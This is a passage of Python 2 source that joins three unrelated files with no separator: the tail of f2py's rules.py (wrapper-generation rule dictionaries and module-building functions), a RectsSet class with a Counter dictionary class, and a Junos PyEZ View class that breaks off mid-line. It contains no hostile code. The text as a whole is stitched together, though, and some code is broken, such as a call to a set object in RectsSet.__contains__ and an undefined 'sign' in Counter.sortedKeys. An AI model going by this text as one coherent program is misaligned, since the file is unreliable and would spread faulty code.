{l_not(isintent_callback):"""\t\tfprintf(stderr,\"#vardebugshowvalue# (call-back in C).\\n\",#cbname#);"""}]}, """\ \t\tCFUNCSMESS(\"Saving jmpbuf for `#varname#`.\\n\"); \t\tSWAP(#varname#_capi,#cbname#_capi,PyObject); \t\tSWAP(#varname#_args_capi,#cbname#_args_capi,PyTupleObject); \t\tmemcpy(&#varname#_jmpbuf,&#cbname#_jmpbuf,sizeof(jmp_buf));""", ], 'cleanupfrompyobj': """\ \t\tCFUNCSMESS(\"Restoring jmpbuf for `#varname#`.\\n\"); \t\t#cbname#_capi = #varname#_capi; \t\tPy_DECREF(#cbname#_args_capi); \t\t#cbname#_args_capi = #varname#_args_capi; \t\t#cbname#_nofargs = #varname#_nofargs_capi; \t\tmemcpy(&#cbname#_jmpbuf,&#varname#_jmpbuf,sizeof(jmp_buf)); \t}""", 'need':['SWAP','create_cb_arglist'], '_check':isexternal, '_depend':'' }, # Scalars (not complex) { # Common 'decl':'\t#ctype# #varname# = 0;', 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#);'}, 'callfortran':{isintent_c:'#varname#,',l_not(isintent_c):'&#varname#,'}, 'return':{isintent_out:',#varname#'}, '_check':l_and(isscalar,l_not(iscomplex)) },{ 'need':{hasinitvalue:'math.h'}, '_check':l_and(isscalar,l_not(iscomplex)), #'_depend':'' },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'pyobjfrom':{isintent_inout:"""\ \tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,&#varname#); \tif (f2py_success) {"""}, 'closepyobjfrom':{isintent_inout:"\t} /*if (f2py_success) of #varname# pyobjfrom*/"}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, '_check':l_and(isscalar,l_not(iscomplex),isintent_nothide) },{ 'frompyobj':[ # hasinitvalue... # if pyobj is None: # varname = init # else # from_pyobj(varname) # # isoptional and noinitvalue... # if pyobj is not None: # from_pyobj(varname) # else: # varname is uninitialized # # ... # from_pyobj(varname) # {hasinitvalue:'\tif (#varname#_capi == Py_None) #varname# = #init#; else', '_depend':''}, {l_and(isoptional,l_not(hasinitvalue)):'\tif (#varname#_capi != Py_None)', '_depend':''}, {l_not(islogical):'''\ \t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#pyname#() #nth# (#varname#) can\'t be converted to #ctype#"); \tif (f2py_success) {'''}, {islogical:'''\ \t\t#varname# = (#ctype#)PyObject_IsTrue(#varname#_capi); \t\tf2py_success = 1; \tif (f2py_success) {'''}, ], 'cleanupfrompyobj':'\t} /*if (f2py_success) of #varname#*/', 'need':{l_not(islogical):'#ctype#_from_pyobj'}, '_check':l_and(isscalar,l_not(iscomplex),isintent_nothide), '_depend':'' # },{ # Hidden # '_check':l_and(isscalar,l_not(iscomplex),isintent_hide) },{ # Hidden 'frompyobj':{hasinitvalue:'\t#varname# = #init#;'}, 'need':typedef_need_dict, '_check':l_and(isscalar,l_not(iscomplex),isintent_hide), '_depend':'' },{ # Common 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#);'}, '_check':l_and(isscalar,l_not(iscomplex)), '_depend':'' }, # Complex scalars { # Common 'decl':'\t#ctype# #varname#;', 'callfortran':{isintent_c:'#varname#,',l_not(isintent_c):'&#varname#,'}, 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#.r,#varname#.i);'}, 'return':{isintent_out:',#varname#_capi'}, '_check':iscomplex },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, 'pyobjfrom':{isintent_inout:"""\ \t\tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,&#varname#); \t\tif (f2py_success) {"""}, 'closepyobjfrom':{isintent_inout:"\t\t} /*if (f2py_success) of #varname# pyobjfrom*/"}, '_check':l_and(iscomplex,isintent_nothide) },{ 'frompyobj':[{hasinitvalue:'\tif (#varname#_capi==Py_None) {#varname#.r = #init.r#, #varname#.i = #init.i#;} else'}, {l_and(isoptional,l_not(hasinitvalue)):'\tif (#varname#_capi != Py_None)'}, # '\t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#ctype#_from_pyobj failed in converting #nth# `#varname#\' of #pyname# to C #ctype#\\n");' '\t\tf2py_success = #ctype#_from_pyobj(&#varname#,#varname#_capi,"#pyname#() #nth# (#varname#) can\'t be converted to #ctype#");' '\n\tif (f2py_success) {'], 'cleanupfrompyobj':'\t} /*if (f2py_success) of #varname# frompyobj*/', 'need':['#ctype#_from_pyobj'], '_check':l_and(iscomplex,isintent_nothide), '_depend':'' },{ # Hidden 'decl':{isintent_out:'\tPyObject *#varname#_capi = Py_None;'}, '_check':l_and(iscomplex,isintent_hide) },{ 'frompyobj': {hasinitvalue:'\t#varname#.r = #init.r#, #varname#.i = #init.i#;'}, '_check':l_and(iscomplex,isintent_hide), '_depend':'' },{ # Common 'pyobjfrom':{isintent_out:'\t#varname#_capi = pyobj_from_#ctype#1(#varname#);'}, 'need':['pyobj_from_#ctype#1'], '_check':iscomplex },{ 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#.r,#varname#.i);'}, '_check':iscomplex, '_depend':'' }, # String { # Common 'decl':['\t#ctype# #varname# = NULL;', '\tint slen(#varname#);', '\tPyObject *#varname#_capi = Py_None;'], 'callfortran':'#varname#,', 'callfortranappend':'slen(#varname#),', 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",slen(#varname#),#varname#);'}, # 'freemem':'\tSTRINGFREE(#varname#);', 'return':{isintent_out:',#varname#'}, 'need':['len..'],#'STRINGFREE'], '_check':isstring },{ # Common 'frompyobj':"""\ \tslen(#varname#) = #length#; \tf2py_success = #ctype#_from_pyobj(&#varname#,&slen(#varname#),#init#,#varname#_capi,\"#ctype#_from_pyobj failed in converting #nth# `#varname#\' of #pyname# to C #ctype#\"); \tif (f2py_success) {""", 'cleanupfrompyobj':"""\ \t\tSTRINGFREE(#varname#); \t} /*if (f2py_success) of #varname#*/""", 'need':['#ctype#_from_pyobj','len..','STRINGFREE'], '_check':isstring, '_depend':'' },{ # Not hidden 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'pyobjfrom':{isintent_inout:'''\ \tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,#varname#); \tif (f2py_success) {'''}, 'closepyobjfrom':{isintent_inout:'\t} /*if (f2py_success) of #varname# pyobjfrom*/'}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, '_check':l_and(isstring,isintent_nothide) },{ # Hidden '_check':l_and(isstring,isintent_hide) },{ 'frompyobj':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",slen(#varname#),#varname#);'}, '_check':isstring, '_depend':'' }, # Array { # Common 'decl':['\t#ctype# *#varname# = NULL;', '\tnpy_intp #varname#_Dims[#rank#] = {#rank*[-1]#};', '\tconst int #varname#_Rank = #rank#;', '\tPyArrayObject *capi_#varname#_tmp = NULL;', '\tint capi_#varname#_intent = 0;', ], 'callfortran':'#varname#,', 'return':{isintent_out:',capi_#varname#_tmp'}, 'need':'len..', '_check':isarray },{ # intent(overwrite) array 'decl':'\tint capi_overwrite_#varname# = 1;', 'kwlistxa':'"overwrite_#varname#",', 'xaformat':'i', 'keys_xa':',&capi_overwrite_#varname#', 'docsignxa':'overwrite_#varname#=1,', 'docsignxashort':'overwrite_#varname#,', 'docstropt':'\toverwrite_#varname# := 1 input int', '_check':l_and(isarray,isintent_overwrite), },{ 'frompyobj':'\tcapi_#varname#_intent |= (capi_overwrite_#varname#?0:F2PY_INTENT_COPY);', '_check':l_and(isarray,isintent_overwrite), '_depend':'', }, { # intent(copy) array 'decl':'\tint capi_overwrite_#varname# = 0;', 'kwlistxa':'"overwrite_#varname#",', 'xaformat':'i', 'keys_xa':',&capi_overwrite_#varname#', 'docsignxa':'overwrite_#varname#=0,', 'docsignxashort':'overwrite_#varname#,', 'docstropt':'\toverwrite_#varname# := 0 input int', '_check':l_and(isarray,isintent_copy), },{ 'frompyobj':'\tcapi_#varname#_intent |= (capi_overwrite_#varname#?0:F2PY_INTENT_COPY);', '_check':l_and(isarray,isintent_copy), '_depend':'', },{ 'need':[{hasinitvalue:'forcomb'},{hasinitvalue:'CFUNCSMESS'}], '_check':isarray, '_depend':'' },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, # 'pyobjfrom':{isintent_inout:"""\ # /* Partly because of the following hack, intent(inout) is depreciated, # Use intent(in,out) instead. # \tif ((#varname#_capi != Py_None) && PyArray_Check(#varname#_capi) \\ # \t\t&& (#varname#_capi != (PyObject *)capi_#varname#_tmp)) { # \t\tif (((PyArrayObject *)#varname#_capi)->nd != capi_#varname#_tmp->nd) { # \t\t\tif (#varname#_capi != capi_#varname#_tmp->base) # \t\t\t\tcopy_ND_array((PyArrayObject *)capi_#varname#_tmp->base,(PyArrayObject *)#varname#_capi); # \t\t} else # \t\t\tcopy_ND_array(capi_#varname#_tmp,(PyArrayObject *)#varname#_capi); # \t} # */ # """}, # 'need':{isintent_inout:'copy_ND_array'}, '_check':l_and(isarray,isintent_nothide) },{ 'frompyobj':['\t#setdims#;', '\tcapi_#varname#_intent |= #intent#;', {isintent_hide:'\tcapi_#varname#_tmp = array_from_pyobj(#atype#,#varname#_Dims,#varname#_Rank,capi_#varname#_intent,Py_None);'}, {isintent_nothide:'\tcapi_#varname#_tmp = array_from_pyobj(#atype#,#varname#_Dims,#varname#_Rank,capi_#varname#_intent,#varname#_capi);'}, """\ \tif (capi_#varname#_tmp == NULL) { \t\tif (!PyErr_Occurred()) \t\t\tPyErr_SetString(#modulename#_error,\"failed in converting #nth# `#varname#\' of #pyname# to C/Fortran array\" ); \t} else { \t\t#varname# = (#ctype# *)(capi_#varname#_tmp->data); """, {hasinitvalue:[ {isintent_nothide:'\tif (#varname#_capi == Py_None) {'}, {isintent_hide:'\t{'}, {iscomplexarray:'\t\t#ctype# capi_c;'}, """\ \t\tint *_i,capi_i=0; \t\tCFUNCSMESS(\"#name#: Initializing #varname#=#init#\\n\"); \t\tif (initforcomb(capi_#varname#_tmp->dimensions,capi_#varname#_tmp->nd,1)) { \t\t\twhile ((_i = nextforcomb())) \t\t\t\t#varname#[capi_i++] = #init#; /* fortran way */ \t\t} else { \t\t\tif (!PyErr_Occurred()) \t\t\t\tPyErr_SetString(#modulename#_error,\"Initialization of #nth# #varname# failed (initforcomb).\"); \t\t\tf2py_success = 0; \t\t} \t} \tif (f2py_success) {"""]}, ], 'cleanupfrompyobj':[ # note that this list will be reversed '\t} /*if (capi_#varname#_tmp == NULL) ... else of #varname#*/', {l_not(l_or(isintent_out,isintent_hide)):"""\ \tif((PyObject *)capi_#varname#_tmp!=#varname#_capi) { \t\tPy_XDECREF(capi_#varname#_tmp); }"""}, {l_and(isintent_hide,l_not(isintent_out)):"""\t\tPy_XDECREF(capi_#varname#_tmp);"""}, {hasinitvalue:'\t} /*if (f2py_success) of #varname# init*/'}, ], '_check':isarray, '_depend':'' }, # { # Hidden # 'freemem':{l_not(isintent_out):'\tPy_XDECREF(capi_#varname#_tmp);'}, # '_check':l_and(isarray,isintent_hide) # }, # Scalararray { # Common '_check':l_and(isarray,l_not(iscomplexarray)) },{ # Not hidden '_check':l_and(isarray,l_not(iscomplexarray),isintent_nothide) }, # Integer*1 array {'need':'#ctype#', '_check':isint1array, '_depend':'' }, # Integer*-1 array {'need':'#ctype#', '_check':isunsigned_chararray, '_depend':'' }, # Integer*-2 array {'need':'#ctype#', '_check':isunsigned_shortarray, '_depend':'' }, # Integer*-8 array {'need':'#ctype#', '_check':isunsigned_long_longarray, '_depend':'' }, # Complexarray {'need':'#ctype#', '_check':iscomplexarray, '_depend':'' }, # Stringarray { 'callfortranappend':{isarrayofstrings:'flen(#varname#),'}, 'need':'string', '_check':isstringarray } ] ################# Rules for checking ############### check_rules=[ { 'frompyobj':{debugcapi:'\tfprintf(stderr,\"debug-capi:Checking `#check#\'\\n\");'}, 'need':'len..' },{ 'frompyobj':'\tCHECKSCALAR(#check#,\"#check#\",\"#nth# #varname#\",\"#varshowvalue#\",#varname#) {', 'cleanupfrompyobj':'\t} /*CHECKSCALAR(#check#)*/', 'need':'CHECKSCALAR', '_check':l_and(isscalar,l_not(iscomplex)), '_break':'' },{ 'frompyobj':'\tCHECKSTRING(#check#,\"#check#\",\"#nth# #varname#\",\"#varshowvalue#\",#varname#) {', 'cleanupfrompyobj':'\t} /*CHECKSTRING(#check#)*/', 'need':'CHECKSTRING', '_check':isstring, '_break':'' },{ 'need':'CHECKARRAY', 'frompyobj':'\tCHECKARRAY(#check#,\"#check#\",\"#nth# #varname#\") {', 'cleanupfrompyobj':'\t} /*CHECKARRAY(#check#)*/', '_check':isarray, '_break':'' },{ 'need':'CHECKGENERIC', 'frompyobj':'\tCHECKGENERIC(#check#,\"#check#\",\"#nth# #varname#\") {', 'cleanupfrompyobj':'\t} /*CHECKGENERIC(#check#)*/', } ] ########## Applying the rules. No need to modify what follows ############# #################### Build C/API module ####################### def buildmodule(m,um): """ Return """ global f2py_version,options outmess('\tBuilding module "%s"...\n'%(m['name'])) ret = {} mod_rules=defmod_rules[:] vrd=modsign2map(m) rd=dictappend({'f2py_version':f2py_version},vrd) funcwrappers = [] funcwrappers2 = [] # F90 codes for n in m['interfaced']: nb=None for bi in m['body']: if not bi['block']=='interface': errmess('buildmodule: Expected interface block. Skipping.\n') continue for b in bi['body']: if b['name']==n: nb=b;break if not nb: errmess('buildmodule: Could not found the body of interfaced routine "%s". Skipping.\n'%(n)) continue nb_list = [nb] if 'entry' in nb: for k,a in nb['entry'].items(): nb1 = copy.deepcopy(nb) del nb1['entry'] nb1['name'] = k nb1['args'] = a nb_list.append(nb1) for nb in nb_list: api,wrap=buildapi(nb) if wrap: if ismoduleroutine(nb): funcwrappers2.append(wrap) else: funcwrappers.append(wrap) ar=applyrules(api,vrd) rd=dictappend(rd,ar) # Construct COMMON block support cr,wrap = common_rules.buildhooks(m) if wrap: funcwrappers.append(wrap) ar=applyrules(cr,vrd) rd=dictappend(rd,ar) # Construct F90 module support mr,wrap = f90mod_rules.buildhooks(m) if wrap: funcwrappers2.append(wrap) ar=applyrules(mr,vrd) rd=dictappend(rd,ar) for u in um: ar=use_rules.buildusevars(u,m['use'][u['name']]) rd=dictappend(rd,ar) needs=cfuncs.get_needs() code={} for n in needs.keys(): code[n]=[] for k in needs[n]: c='' if k in cfuncs.includes0: c=cfuncs.includes0[k] elif k in cfuncs.includes: c=cfuncs.includes[k] elif k in cfuncs.userincludes: c=cfuncs.userincludes[k] elif k in cfuncs.typedefs: c=cfuncs.typedefs[k] elif k in cfuncs.typedefs_generated: c=cfuncs.typedefs_generated[k] elif k in cfuncs.cppmacros: c=cfuncs.cppmacros[k] elif k in cfuncs.cfuncs: c=cfuncs.cfuncs[k] elif k in cfuncs.callbacks: c=cfuncs.callbacks[k] elif k in cfuncs.f90modhooks: c=cfuncs.f90modhooks[k] elif k in cfuncs.commonhooks: c=cfuncs.commonhooks[k] else: errmess('buildmodule: unknown need %s.\n'%(`k`));continue code[n].append(c) mod_rules.append(code) for r in mod_rules: if ('_check' in r and r['_check'](m)) or ('_check' not in r): ar=applyrules(r,vrd,m) rd=dictappend(rd,ar) ar=applyrules(module_rules,rd) fn = os.path.join(options['buildpath'],vrd['modulename']+'module.c') ret['csrc'] = fn f=open(fn,'w') f.write(ar['modulebody'].replace('\t',2*' ')) f.close() outmess('\tWrote C/API module "%s" to file "%s/%smodule.c"\n'%(m['name'],options['buildpath'],vrd['modulename'])) if options['dorestdoc']: fn = os.path.join(options['buildpath'],vrd['modulename']+'module.rest') f=open(fn,'w') f.write('.. -*- rest -*-\n') f.write('\n'.join(ar['restdoc'])) f.close() outmess('\tReST Documentation is saved to file "%s/%smodule.rest"\n'%(options['buildpath'],vrd['modulename'])) if options['dolatexdoc']: fn = os.path.join(options['buildpath'],vrd['modulename']+'module.tex') ret['ltx'] = fn f=open(fn,'w') f.write('%% This file is auto-generated with f2py (version:%s)\n'%(f2py_version)) if 'shortlatex' not in options: f.write('\\documentclass{article}\n\\usepackage{a4wide}\n\\begin{document}\n\\tableofcontents\n\n') f.write('\n'.join(ar['latexdoc'])) if 'shortlatex' not in options: f.write('\\end{document}') f.close() outmess('\tDocumentation is saved to file "%s/%smodule.tex"\n'%(options['buildpath'],vrd['modulename'])) if funcwrappers: wn = os.path.join(options['buildpath'],'%s-f2pywrappers.f'%(vrd['modulename'])) ret['fsrc'] = wn f=open(wn,'w') f.write('C -*- fortran -*-\n') f.write('C This file is autogenerated with f2py (version:%s)\n'%(f2py_version)) f.write('C It contains Fortran 77 wrappers to fortran functions.\n') lines = [] for l in ('\n\n'.join(funcwrappers)+'\n').split('\n'): if l and l[0]==' ': while len(l)>=66: lines.append(l[:66]+'\n &') l = l[66:] lines.append(l+'\n') else: lines.append(l+'\n') lines = ''.join(lines).replace('\n &\n','\n') f.write(lines) f.close() outmess('\tFortran 77 wrappers are saved to "%s"\n'%(wn)) if funcwrappers2: wn = os.path.join(options['buildpath'],'%s-f2pywrappers2.f90'%(vrd['modulename'])) ret['fsrc'] = wn f=open(wn,'w') f.write('! -*- f90 -*-\n') f.write('! This file is autogenerated with f2py (version:%s)\n'%(f2py_version)) f.write('! It contains Fortran 90 wrappers to fortran functions.\n') lines = [] for l in ('\n\n'.join(funcwrappers2)+'\n').split('\n'): if len(l)>72 and l[0]==' ': lines.append(l[:72]+'&\n &') l = l[72:] while len(l)>66: lines.append(l[:66]+'&\n &') l = l[66:] lines.append(l+'\n') else: lines.append(l+'\n') lines = ''.join(lines).replace('\n &\n','\n') f.write(lines) f.close() outmess('\tFortran 90 wrappers are saved to "%s"\n'%(wn)) return ret ################## Build C/API function ############# stnd={1:'st',2:'nd',3:'rd',4:'th',5:'th',6:'th',7:'th',8:'th',9:'th',0:'th'} def buildapi(rout): rout,wrap = func2subr.assubr(rout) args,depargs=getargs2(rout) capi_maps.depargs=depargs var=rout['vars'] auxvars = [a for a in var.keys() if isintent_aux(var[a])] if ismoduleroutine(rout): outmess('\t\t\tConstructing wrapper function "%s.%s"...\n'%(rout['modulename'],rout['name'])) else: outmess('\t\tConstructing wrapper function "%s"...\n'%(rout['name'])) # Routine vrd=routsign2map(rout) rd=dictappend({},vrd) for r in rout_rules: if ('_check' in r and r['_check'](rout)) or ('_check' not in r): ar=applyrules(r,vrd,rout) rd=dictappend(rd,ar) # Args nth,nthk=0,0 savevrd={} for a in args: vrd=sign2map(a,var[a]) if isintent_aux(var[a]): _rules = aux_rules else: _rules = arg_rules if not isintent_hide(var[a]): if not isoptional(var[a]): nth=nth+1 vrd['nth']=`nth`+stnd[nth%10]+' argument' else: nthk=nthk+1 vrd['nth']=`nthk`+stnd[nthk%10]+' keyword' else: vrd['nth']='hidden' savevrd[a]=vrd for r in _rules: if '_depend' in r: continue if ('_check' in r and r['_check'](var[a])) or ('_check' not in r): ar=applyrules(r,vrd,var[a]) rd=dictappend(rd,ar) if '_break' in r: break for a in depargs: if isintent_aux(var[a]): _rules = aux_rules else: _rules = arg_rules vrd=savevrd[a] for r in _rules: if '_depend' not in r: continue if ('_check' in r and r['_check'](var[a])) or ('_check' not in r): ar=applyrules(r,vrd,var[a]) rd=dictappend(rd,ar) if '_break' in r: break if 'check' in var[a]: for c in var[a]['check']: vrd['check']=c ar=applyrules(check_rules,vrd,var[a]) rd=dictappend(rd,ar) if type(rd['cleanupfrompyobj']) is types.ListType: rd['cleanupfrompyobj'].reverse() if type(rd['closepyobjfrom']) is types.ListType: rd['closepyobjfrom'].reverse() rd['docsignature']=stripcomma(replace('#docsign##docsignopt##docsignxa#', {'docsign':rd['docsign'], 'docsignopt':rd['docsignopt'], 'docsignxa':rd['docsignxa']})) optargs=stripcomma(replace('#docsignopt##docsignxa#', {'docsignxa':rd['docsignxashort'], 'docsignopt':rd['docsignoptshort']} )) if optargs=='': rd['docsignatureshort']=stripcomma(replace('#docsign#',{'docsign':rd['docsign']})) else: rd['docsignatureshort']=replace('#docsign#[#docsignopt#]', {'docsign':rd['docsign'], 'docsignopt':optargs, }) rd['latexdocsignatureshort']=rd['docsignatureshort'].replace('_','\\_') rd['latexdocsignatureshort']=rd['latexdocsignatureshort'].replace(',',', ') cfs=stripcomma(replace('#callfortran##callfortranappend#',{'callfortran':rd['callfortran'],'callfortranappend':rd['callfortranappend']})) if len(rd['callfortranappend'])>1: rd['callcompaqfortran']=stripcomma(replace('#callfortran# 0,#callfortranappend#',{'callfortran':rd['callfortran'],'callfortranappend':rd['callfortranappend']})) else: rd['callcompaqfortran']=cfs rd['callfortran']=cfs if type(rd['docreturn'])==types.ListType: rd['docreturn']=stripcomma(replace('#docreturn#',{'docreturn':rd['docreturn']}))+' = ' rd['docstrsigns']=[] rd['latexdocstrsigns']=[] for k in ['docstrreq','docstropt','docstrout','docstrcbs']: if k in rd and type(rd[k])==types.ListType: rd['docstrsigns']=rd['docstrsigns']+rd[k] k='latex'+k if k in rd and type(rd[k])==types.ListType: rd['latexdocstrsigns']=rd['latexdocstrsigns']+rd[k][0:1]+\ ['\\begin{description}']+rd[k][1:]+\ ['\\end{description}'] # Workaround for Python 2.6, 2.6.1 bug: http://bugs.python.org/issue4720 if rd['keyformat'] or rd['xaformat']: argformat = rd['argformat'] if isinstance(argformat, list): argformat.append('|') else: assert isinstance(argformat, str),repr((argformat, type(argformat))) rd['argformat'] += '|' ar=applyrules(routine_rules,rd) if ismoduleroutine(rout): outmess('\t\t\t %s\n'%(ar['docshort'])) else: outmess('\t\t %s\n'%(ar['docshort'])) return ar,wrap #################### EOF rules.py #######################
from collections import MutableSet from math import hypot def _build_variant(cls, opname): fn = getattr(cls, opname) if hasattr(fn, 'im_func'): fn = fn.im_func def method(self, other, fn=fn): if not isinstance(other, MutableSet): other = self._from_iterable(other) return fn(self, other) return method class RectsSet(MutableSet) : """ used as a set of rectangulars in image, where two elements are unique only if they are not approximately near.""" intersection = _build_variant(MutableSet, '__and__') union = _build_variant(MutableSet, '__or__') difference = _build_variant(MutableSet, '__sub__') symmetric_difference = _build_variant(MutableSet, '__xor__') issubset = _build_variant(MutableSet, '__le__') issuperset = _build_variant(MutableSet, '__ge__') intersection_update = _build_variant(MutableSet, '__iand__') update = _build_variant(MutableSet, '__ior__') difference_update = _build_variant(MutableSet, '__isub__') symmetric_difference_update = _build_variant(MutableSet, '__ixor__') def __init__(self, initVal = () ) : self.mySet = set() for x in initVal : self.add(x) def add(self, otherRect) : """special add operator""" otherRectCenter = ( int( (otherRect[0] + otherRect[2])/ 2.0 ), int ((otherRect[1] + otherRect[3])/ 2.0 ) ) toAdd = True for rect in self.mySet : rectCenter = ( int( (rect[0] + rect[2])/ 2.0 ), int ((rect[1] + rect[3])/ 2.0 ) ) if hypot(rectCenter[0] - otherRectCenter[0], rectCenter[1] - otherRectCenter[1]) < 10 : toAdd = False break if toAdd : self.mySet.add(otherRect) def __contains__(self, x): return x in self.mySet() def __len__(self) : return len(self.mySet) def __iter__(self) : return iter(self.mySet) def discard(self, x) : self.mySet.discard(x) class Counter(dict): """ A counter keeps track of counts for a set of keys. The counter class is an extension of the standard python dictionary type. It is specialized to have number values (integers or floats), and includes a handful of additional functions to ease the task of counting data. In particular, all keys are defaulted to have value 0. Using a dictionary: a = {} print a['test'] would give an error, while the Counter class analogue: >>> a = Counter() >>> print a['test'] 0 returns the default 0 value. Note that to reference a key that you know is contained in the counter, you can still use the dictionary syntax: >>> a = Counter() >>> a['test'] = 2 >>> print a['test'] 2 This is very useful for counting things without initializing their counts, see for example: >>> a['blah'] += 1 >>> print a['blah'] 1 The counter also includes additional functionality useful in implementing the classifiers for this assignment. Two counters can be added, subtracted or multiplied together. See below for details. They can also be normalized and their total count and arg max can be extracted. """ def __getitem__(self, idx): self.setdefault(idx, 0) return dict.__getitem__(self, idx) def incrementAll(self, keys, count): """ Increments all elements of keys by the same count. >>> a = Counter() >>> a.incrementAll(['one','two', 'three'], 1) >>> a['one'] 1 >>> a['two'] 1 """ for key in keys: self[key] += count def argMax(self): """ Returns the key with the highest value. """ if len(self.keys()) == 0: return None all = self.items() values = [x[1] for x in all] maxIndex = values.index(max(values)) return all[maxIndex][0] def sortedKeys(self): """ Returns a list of keys sorted by their values. Keys with the highest values will appear first. >>> a = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> a['third'] = 1 >>> a.sortedKeys() ['second', 'third', 'first'] """ sortedItems = self.items() compare = lambda x, y: sign(y[1] - x[1]) sortedItems.sort(cmp=compare) return [x[0] for x in sortedItems] def totalCount(self): """ Returns the sum of counts for all keys. """ return sum(self.values()) def normalize(self): """ Edits the counter such that the total count of all keys sums to 1. The ratio of counts for all keys will remain the same. Note that normalizing an empty Counter will result in an error. """ total = float(self.totalCount()) if total == 0: return for key in self.keys(): self[key] = self[key] / total def divideAll(self, divisor): """ Divides all counts by divisor """ divisor = float(divisor) for key in self: self[key] /= divisor def copy(self): """ Returns a copy of the counter """ return Counter(dict.copy(self)) def __mul__(self, y ): """ Multiplying two counters gives the dot product of their vectors where each unique label is a vector element. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['second'] = 5 >>> a['third'] = 1.5 >>> a['fourth'] = 2.5 >>> a * b 14 """ sum = 0 x = self if len(x) > len(y): x,y = y,x for key in x: if key not in y: continue sum += x[key] * y[key] return sum def __radd__(self, y): """ Adding another counter to a counter increments the current counter by the values stored in the second counter. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> a += b >>> a['first'] 1 """ for key, value in y.items(): self[key] += value def __add__( self, y ): """ Adding two counters gives a counter with the union of all keys and counts of the second added to counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a + b)['first'] 1 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] + y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = y[key] return addend def __sub__( self, y ): """ Subtracting a counter from another gives a counter with the union of all keys and counts of the second subtracted from counts of the first. >>> a = Counter() >>> b = Counter() >>> a['first'] = -2 >>> a['second'] = 4 >>> b['first'] = 3 >>> b['third'] = 1 >>> (a - b)['first'] -5 """ addend = Counter() for key in self: if key in y: addend[key] = self[key] - y[key] else: addend[key] = self[key] for key in y: if key in self: continue addend[key] = -1 * y[key] return addend
import warnings from contextlib import contextmanager from copy import deepcopy from lxml import etree import json import sys from jnpr.junos.factory.viewfields import ViewFields from jnpr.junos.factory.to_json import TableViewJSONEncoder class View(object): """ View is the base-class that makes extracting values from XML data appear as objects with attributes. """ ITEM_NAME_XPATH = 'name' FIELDS = {} GROUPS = None # ------------------------------------------------------------------------- # CONSTRUCTOR # ------------------------------------------------------------------------- def __init__(self, table, view_xml): """ :table: instance of the RunstatTable :view_xml: this should be an lxml etree Elemenet object. This constructor also accepts a list with a single item/XML """ # if as_xml is passed as a list, make sure it only has # a single item, common response from an xpath search if isinstance(view_xml, list): if 1 == len(view_xml): view_xml = view_xml[0] else: raise ValueError("constructor only accepts a single item") # now ensure that the thing provided is an lxml etree Element if not isinstance(view_xml, etree._Element): raise ValueError("constructor only accecpts lxml.etree._Element") self._table = table self.ITEM_NAME_XPATH = table.ITEM_NAME_XPATH self._init_xml(view_xml) def _init_xml(self, given_xml): self._xml = given_xml if self.GROUPS is not None: self._groups = {} for xg_name, xg_xpath in self.GROUPS.items(): xg_xml = self._xml.xpath(xg_xpath) # @@@ this is technically an error; need to trap it if not len(xg_xml): continue self._groups[xg_name] = xg_xml[0] # ------------------------------------------------------------------------- # PROPERTIES # ------------------------------------------------------------------------- @property def T(self): """ return the Table instance for the View """ return self._table @property def D(self): """ return the Device instance for this View """ return self.T.D @property def name(self): """ return the name of view item """ if self.ITEM_NAME_XPATH is None: return self._table.D.hostname if isinstance(self.ITEM_NAME_XPATH, str): # xpath union key if ' | ' in self.ITEM_NAME_XPATH: return self._xml.xpath(self.ITEM_NAME_XPATH)[0].text.strip() # simple key return self._xml.findtext(self.ITEM_NAME_XPATH).strip() else: # composite key # keys with missing XPATH nodes are set to None keys = [] for i in self.ITEM_NAME_XPATH: try: keys.append(self.xml.xpath(i)[0].text.strip()) except: keys.append(None) return tuple(keys) # ALIAS key <=> name key = name @property def xml(self): """ returns the XML associated to the item """ return self._xml # ------------------------------------------------------------------------- # METHODS # ------------------------------------------------------------------------- def keys(self): """ list of view keys, i.e. field names """ return self.FIELDS.keys() def values(self): """ list of view values """ return [getattr(self, field) for field in self.keys()] def items(self): """ list of tuple(key,value) """ return zip(self.keys(), self.values()) def _updater_instance(self, more): """ called from extend """ if hasattr(more, 'fields'): self.FIELDS = deepcopy(self.__class__.FIELDS) self.FIELDS.update(more.fields.end) if hasattr(more, 'groups'): self.GROUPS = 